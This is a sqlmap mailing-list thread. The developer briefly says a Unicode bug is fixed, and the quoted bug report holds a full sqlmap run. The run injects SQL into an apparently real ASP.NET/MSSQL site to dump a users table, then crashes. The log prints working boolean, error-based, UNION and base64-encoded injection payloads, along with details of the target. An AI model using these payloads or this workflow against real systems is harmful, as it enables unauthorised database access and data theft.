Re: [sqlmap-users] encode err ? thx
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] encode err ? thx
|
From: Miroslav S. <mir...@gm...> - 2013-09-21 10:25:27
|
Hi. This should be fixed now. Bye On Sat, Sep 21, 2013 at 4:55 AM, 沸水浮冰 <sf...@gm...> wrote: > root@anonymous:~/sqlmap-0905# ./sqlmap.py -r file2 -p 'major' > --dbms=mssql --level=5 --risk=3 --tamper=base64encode -D vls3db4 -T > dbo.dd_users -C '最后登录时间' --dump --hex -v 3 > > sqlmap/1.0-dev-4cf49bc - automatic SQL injection and database takeover > tool > http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior > mutual consent is illegal. It is the end user's responsibility to obey all > applicable local, state and federal laws. Developers assume no liability > and are not responsible for any misuse or damage caused by this program > > [*] starting at 00:51:25 > > [00:51:25] [INFO] parsing HTTP request from 'file2' > [00:51:25] [DEBUG] not a valid WebScarab log data > [00:51:25] [DEBUG] cleaning up configuration parameters > [00:51:25] [INFO] loading tamper script 'base64encode' > [00:51:25] [DEBUG] setting the HTTP timeout > [00:51:25] [DEBUG] setting the HTTP method to GET > [00:51:25] [DEBUG] creating HTTP requests opener object > [00:51:25] [DEBUG] forcing back-end DBMS to user defined value > [00:51:25] [WARNING] it appears that you have provided tainted parameter > values ('major=')waitfor delay'0:0:20'--') with most probably leftover > chars/statements from manual SQL injection test(s). Please, always use only > valid parameter values so sqlmap could be able to run properly > Are you sure you want to continue? [y/N] y > [00:51:26] [INFO] testing connection to the target URL > [00:51:49] [DEBUG] declared web page charset 'gb2312' > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: GET > Parameter: major > Type: boolean-based blind > Title: OR boolean-based blind - WHERE or HAVING clause > Payload: classid=&specialid=2&qstr=&major=-1315') OR (1954=1954) AND > ('IRZo'='IRZo&station=&idxpage=2&ptopid= > Vector: OR ([INFERENCE]) > > Type: error-based > Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING > clause > Payload: classid=&specialid=2&qstr=&major=-3052') OR > 5359=CONVERT(INT,(SELECT > CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+(SELECT (CASE WHEN > (5359=5359) THEN CHAR(49) ELSE CHAR(48) > END))+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113))) AND > ('PLJO'='PLJO&station=&idxpage=2&ptopid= > Vector: OR [RANDNUM]=CONVERT(INT,(SELECT > '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) > > Type: UNION query > Title: Generic UNION query (random number) - 16 columns > Payload: classid=&specialid=2&qstr=&major=-7814') UNION ALL SELECT > CHAR(113)+CHAR(122)+CHAR(118)+CHAR(121)+CHAR(113)+CHAR(106)+CHAR(86)+CHAR(99)+CHAR(114)+CHAR(70)+CHAR(111)+CHAR(78)+CHAR(116)+CHAR(69)+CHAR(87)+CHAR(113)+CHAR(101)+CHAR(99)+CHAR(99)+CHAR(113),1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654,1654-- > &station=&idxpage=2&ptopid= > Vector: UNION ALL SELECT > [QUERY],9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026,9026-- > > --- > [00:51:49] [WARNING] changes made by tampering scripts are not included in > shown payload content(s) > [00:51:49] [INFO] testing Microsoft SQL Server > [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds > [00:51:49] [INFO] confirming Microsoft SQL Server > [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds > [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds > [00:51:49] [DEBUG] performed 0 queries in 0.00 seconds > [00:51:49] [PAYLOAD] > LTQ3MjInKSBVTklPTiBBTEwgU0VMRUNUIENIQVIoMTEzKStDSEFSKDEyMikrQ0hBUigxMTgpK0NIQVIoMTIxKStDSEFSKDExMykrKENBU0UgV0hFTiAoQ09OQ0FUKE5VTEwsTlVMTCk9Q09OQ0FUKE5VTEwsTlVMTCkpIFRIRU4gQ0hBUig0OSkgRUxTRSBDSEFSKDQ4KSBFTkQpK0NIQVIoMTEzKStDSEFSKDEwMSkrQ0hBUig5OSkrQ0hBUig5OSkrQ0hBUigxMTMpLDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LDYyNjYsNjI2Niw2MjY2LS0g > [00:51:50] [DEBUG] performed 1 queries in 0.57 seconds > [00:51:50] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows 2003 > web application technology: ASP.NET, Microsoft IIS 6.0 > back-end DBMS: Microsoft SQL Server 2008 > [00:51:50] [INFO] fetching columns '最后登录时间' for table 'dd_users' in > database 'vls3db4' > [00:51:50] [INFO] the SQL query used returns 1 entries > [00:51:50] [DEBUG] performed 0 queries in 0.02 seconds > [00:51:50] [INFO] fetching entries of column(s) '[最后登录时间]' for table > 'dd_users' in database 'vls3db4' > [00:51:50] [DEBUG] performed 0 queries in 0.00 seconds > [00:51:50] [INFO] fetching number of distinct values for column '[最后登录时间]' > > Traceback (most recent call last): > File "/root/sqlmap-0905/thirdparty/ansistrm/ansistrm.py", line 51, in > emit > message = stdoutencode(self.format(record)) > File "/root/sqlmap-0905/lib/core/convert.py", line 160, in stdoutencode > retVal = data.encode(UNICODE_ENCODING) > UnicodeDecodeError: 'ascii' codec can't decode byte 0xe6 in position 688: > ordinal not in range(128) > Logged from file sqlmap.py, line 125 > Traceback (most recent call last): > File "./sqlmap.py", line 95, in main > start() > File "/root/sqlmap-0905/lib/controller/controller.py", line 582, in start > action() > File "/root/sqlmap-0905/lib/controller/action.py", line 127, in action > conf.dbmsHandler.dumpTable() > File "/root/sqlmap-0905/plugins/generic/entries.py", line 155, in > dumpTable > retVal = pivotDumpTable(table, colList, blind=False) > File "/root/sqlmap-0905/lib/utils/pivotdumptable.py", line 86, in > pivotDumpTable > value = inject.getValue(query, blind=blind, union=not blind, error=not > blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) > File "/root/sqlmap-0905/lib/request/inject.py", line 360, in getValue > value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else > query, unpack, dump) > File "/root/sqlmap-0905/lib/request/inject.py", line 312, in _goUnion > output = unionUse(expression, unpack=unpack, dump=dump) > File "/root/sqlmap-0905/lib/techniques/union/use.py", line 334, in > unionUse > output = _oneShotUnionUse(expression, unpack) > File "/root/sqlmap-0905/lib/techniques/union/use.py", line 73, in > _oneShotUnionUse > page, headers = Request.queryPage(payload, content=True, > raise404=False) > File "/root/sqlmap-0905/lib/request/connect.py", line 641, in queryPage > payload = function(payload=payload, headers=auxHeaders) > File "/root/sqlmap-0905/tamper/base64encode.py", line 25, in tamper > return base64.b64encode(payload) if payload else payload > File "/usr/lib/python2.7/base64.py", line 53, in b64encode > encoded = binascii.b2a_base64(s)[:-1] > UnicodeEncodeError: 'ascii' codec can't encode characters in position > 147-152: ordinal not in range(128) > > [*] shutting down at 00:51:50 > > > > ------------------------------------------------------------------------------ > LIMITED TIME SALE - Full Year of Microsoft Training For Just $49.99! > 1,500+ hours of tutorials including VisualStudio 2012, Windows 8, > SharePoint > 2013, SQL 2012, MVC 4, more. BEST VALUE: New Multi-Library Power Pack > includes > Mobile, Cloud, Java, and UX Design. Lowest price ever! Ends 9/22/13. > http://pubads.g.doubleclick.net/gampad/clk?id=64545871&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
